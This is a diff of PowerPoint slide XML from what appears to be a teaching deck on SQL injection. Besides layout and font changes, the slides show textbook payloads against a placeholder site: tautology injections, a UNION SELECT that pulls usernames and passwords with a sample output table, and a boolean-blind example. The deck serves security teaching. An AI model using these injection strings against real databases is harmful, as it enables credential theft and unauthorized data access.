-            <a:off x="3017880" y="640080"/>
-            <a:ext cx="6491880" cy="601920"/>
+            <a:off x="182880" y="217080"/>
+            <a:ext cx="1551960" cy="363960"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5656,48 +5836,40 @@
         </p:style>
         <p:txBody>
           <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>In-band; where the results are </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>returned in the response</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="97" name="CustomShape 3"/>
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>In-Band SQLi</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="96" name="CustomShape 2"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="2560320" y="3512880"/>
-            <a:ext cx="7406640" cy="601920"/>
+            <a:off x="3017880" y="640080"/>
+            <a:ext cx="6491520" cy="601560"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5718,46 +5890,37 @@
             <a:noAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:pPr algn="ctr">
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>site.com/products?id=1+and+1=1</a:t>
-            </a:r>
-            <a:br/>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>select product, stockcount from products where id = 1 or 1=1</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="98" name="CustomShape 4"/>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>In-band; where the results are returned in the response</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="97" name="CustomShape 3"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="3749040" y="4206240"/>
-            <a:ext cx="4754520" cy="2016720"/>
+            <a:off x="2560320" y="3512880"/>
+            <a:ext cx="7406280" cy="601560"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5778,169 +5941,48 @@
             <a:noAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>+-------------------------------------+</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>| product             | stockcount    |</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>+-------------------------------------+</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>| Model Car           | 342           |</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>| Model Boat          | 43            |</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>| Model Plane         | 542           |</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>| Model Drone         | 43            |</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>+-------------------------------------+</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="99" name="CustomShape 5"/>
+            <a:pPr algn="ctr">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>site.com/products?id=1+and+1=1</a:t>
+            </a:r>
+            <a:br/>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>select product, stockcount from products where id = 1 or 1=1</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="98" name="CustomShape 4"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="3111120" y="1226880"/>
-            <a:ext cx="6464880" cy="601920"/>
+            <a:off x="3749040" y="4206240"/>
+            <a:ext cx="4754160" cy="2016360"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5961,46 +6003,177 @@
             <a:noAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:pPr algn="ctr">
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>site.com/products?id=1</a:t>
-            </a:r>
-            <a:br/>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>select product, stockcount from products where id = 1 </a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="100" name="CustomShape 6"/>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>+-------------------------------------+</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>| product             | stockcount    |</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>+-------------------------------------+</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>| Model Car           | 342           |</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>| Model Boat          | 43            |</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>| Model Plane         | 542           |</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>| Model Drone         | 43            |</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>+-------------------------------------+</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="99" name="CustomShape 5"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="3749040" y="1828800"/>
-            <a:ext cx="4754520" cy="1559520"/>
+            <a:off x="3111120" y="1226880"/>
+            <a:ext cx="6464520" cy="601560"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6021,17 +6194,80 @@
             <a:noAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
+            <a:pPr algn="ctr">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>site.com/products?id=1</a:t>
+            </a:r>
+            <a:br/>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>select product, stockcount from products where id = 1 </a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="100" name="CustomShape 6"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3749040" y="1828800"/>
+            <a:ext cx="4754160" cy="1559160"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>+-------------------------------------+</a:t>
             </a:r>
@@ -6051,6 +6287,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>| product             | stockcount    |</a:t>
             </a:r>
@@ -6070,6 +6307,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>+-------------------------------------+</a:t>
             </a:r>
@@ -6089,6 +6327,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>| Model Car           | 342           |</a:t>
             </a:r>
@@ -6108,6 +6347,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>+-------------------------------------+</a:t>
             </a:r>
@@ -6156,7 +6396,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="182880" y="182880"/>
-            <a:ext cx="1776240" cy="363960"/>
+            <a:ext cx="1775880" cy="363600"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6207,7 +6447,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="3017520" y="593280"/>
-            <a:ext cx="6491880" cy="601920"/>
+            <a:ext cx="6491520" cy="601560"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6239,6 +6479,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>In-band; where the results are returned in the response</a:t>
             </a:r>
@@ -6257,7 +6498,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="2103480" y="1232280"/>
-            <a:ext cx="8137800" cy="2043000"/>
+            <a:ext cx="8137440" cy="2042640"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6289,6 +6530,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>site.com/products?id=1+and+union+select+username,+password+from+users</a:t>
             </a:r>
@@ -6300,6 +6542,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>select product, stockcount </a:t>
             </a:r>
@@ -6319,6 +6562,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>from products where id = 1 </a:t>
             </a:r>
@@ -6338,6 +6582,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>and </a:t>
             </a:r>
@@ -6357,6 +6602,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>union select username, password from users</a:t>
             </a:r>
@@ -6375,7 +6621,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="3729960" y="3275280"/>
-            <a:ext cx="4754520" cy="3205440"/>
+            <a:ext cx="4754160" cy="3205080"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6407,6 +6653,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>+-------------------------------------+</a:t>
             </a:r>
@@ -6426,6 +6673,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>| product             | stockcount    |</a:t>
             </a:r>
@@ -6445,6 +6693,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>+-------------------------------------+</a:t>
             </a:r>
@@ -6464,6 +6713,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>| Model Car           | 342           |</a:t>
             </a:r>
@@ -6483,6 +6733,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>| vortex              | password1     |</a:t>
             </a:r>
@@ -6502,6 +6753,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>| st0rm               | arch4lyfe     |</a:t>
             </a:r>
@@ -6521,6 +6773,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>| jakob               | xssismybag    |</a:t>
             </a:r>
@@ -6540,6 +6793,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>| jake                | 1337jake!     |</a:t>
             </a:r>
@@ -6559,6 +6813,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>| josh                | notcasper     |</a:t>
             </a:r>
@@ -6578,6 +6833,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>+-------------------------------------+</a:t>
             </a:r>
@@ -6626,7 +6882,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="182880" y="182880"/>
-            <a:ext cx="1671120" cy="363960"/>
+            <a:ext cx="1670760" cy="363600"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6677,7 +6933,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="3360960" y="813240"/>
-            <a:ext cx="5394600" cy="1611000"/>
+            <a:ext cx="5394240" cy="1610640"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6709,6 +6965,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>Boolean blind</a:t>
             </a:r>
@@ -6730,6 +6987,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>Find the true/false condition</a:t>
             </a:r>
@@ -6740,6 +6998,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>Useful when there is some visual feedback.</a:t>
             </a:r>
@@ -6758,7 +7017,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="3890160" y="2721960"/>
-            <a:ext cx="4572000" cy="693720"/>
+            <a:ext cx="4571640" cy="693360"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6801,6 +7060,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>site.com/products?id=1+and+1=2 (FALSE)</a:t>
             </a:r>
@@ -6819,7 +7079,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="4663440" y="2790000"/>
-            <a:ext cx="2742840" cy="456840"/>
+            <a:ext cx="2742480" cy="456480"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6845,7 +7105,7 @@
         <p:spPr>
           <a:xfrm>
